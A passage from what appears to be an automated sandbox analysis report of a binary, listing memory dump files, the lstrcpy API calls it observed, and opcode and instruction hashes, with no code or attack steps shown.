                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: c110e772a140b73eaffc4a14eefb04b86e39acb3b694671366540a4937beaff6
                          • Instruction ID: 1322b00c11e45254cbb5b4c1782a07933a0bae7c42624c0f0ecface67284687d
                          • Opcode Fuzzy Hash: c110e772a140b73eaffc4a14eefb04b86e39acb3b694671366540a4937beaff6
                          • Instruction Fuzzy Hash: 1A31B2B4A01F12ABC764DF3AD598956BBE6BF49301700492EA896C7B10DB34F851CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0062162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621693
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 9e5503b9acc9dc994ca8272f683b7da3703d2b82d190a828c279ee2b68b8146b
                          • Instruction ID: 0c6522148bd6dc08ccc970e9c56d5fc6620a4d1fcbc4ec848f5cb5303faca017
                          • Opcode Fuzzy Hash: 9e5503b9acc9dc994ca8272f683b7da3703d2b82d190a828c279ee2b68b8146b
                          • Instruction Fuzzy Hash: E7113A74A11F13ABCB249F36E41896AB7F9BF55701708452DA48ACBB40EB34E8418F90